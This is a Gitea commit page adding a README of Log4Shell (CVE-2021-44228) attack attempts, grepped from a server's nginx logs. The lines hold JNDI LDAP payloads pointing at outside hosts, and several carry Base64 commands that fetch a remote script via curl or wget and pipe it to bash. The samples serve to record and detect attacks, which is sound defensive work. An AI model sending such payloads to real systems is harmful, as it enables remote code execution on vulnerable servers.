alex/log4jsamples
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

stuff

Browse Source
This commit is contained in:
Alex Berry 2021-12-12 11:18:26 +00:00
commit de3384e784
Signed by: alex
GPG Key ID: D5BB9F05EB47A31A
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
README.md Normal file
View File

@ -0,0 +1,15 @@
'''
# zegrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log/nginx/access.log*
/var/log/nginx/access.log:167.99.36.245 - - [12/Dec/2021:00:14:07 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}" "86.20.42.145"
/var/log/nginx/access.log:162.255.202.246 - - [12/Dec/2021:01:13:44 +0000] "GET / HTTP/1.0" 400 0 "-" "${jndi:ldap://172.111.48.30:1389/C}" "127.0.0.1"
/var/log/nginx/access.log.1:5.157.38.50 - - [11/Dec/2021:12:06:06 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 301 178 "-" "curl/7.58.0" "86.20.42.145"
/var/log/nginx/access.log.1:167.99.36.245 - - [11/Dec/2021:18:14:17 +0000] "GET / HTTP/1.1" 200 3410 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}" "86.20.42.145"
/var/log/nginx/access.log.1:37.187.122.82 - - [11/Dec/2021:22:44:28 +0000] "GET / HTTP/1.0" 400 0 "-" "${jndi:ldap://172.111.48.30:1389/C}" "127.0.0.1"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:13:06:45 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "86.20.42.145"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:13:06:45 +0000] "GET / HTTP/1.1" 200 3410 "http://86.20.42.145:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "gitea.helpitsbroken.co.uk"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:14:01:01 +0000] "GET / HTTP/1.1" 200 3404 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0Lzg2LjIwLjQyLjE0NTo0NDMpfGJhc2g=}" "86.20.42.145"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:18:11:00 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "86.20.42.145"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:18:11:02 +0000] "GET / HTTP/1.1" 200 3409 "http://86.20.42.145:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "gitea.helpitsbroken.co.uk"
/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:19:01:07 +0000] "GET / HTTP/1.1" 200 3405 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0Lzg2LjIwLjQyLjE0NTo0NDMpfGJhc2g=}" "86.20.42.145"
/var/log/nginx/access.log.2.gz:185.220.101.145 - - [10/Dec/2021:22:00:05 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://5d79ce725a8f.bingsearchlib.com:39356/a}" "86.20.42.145"
'''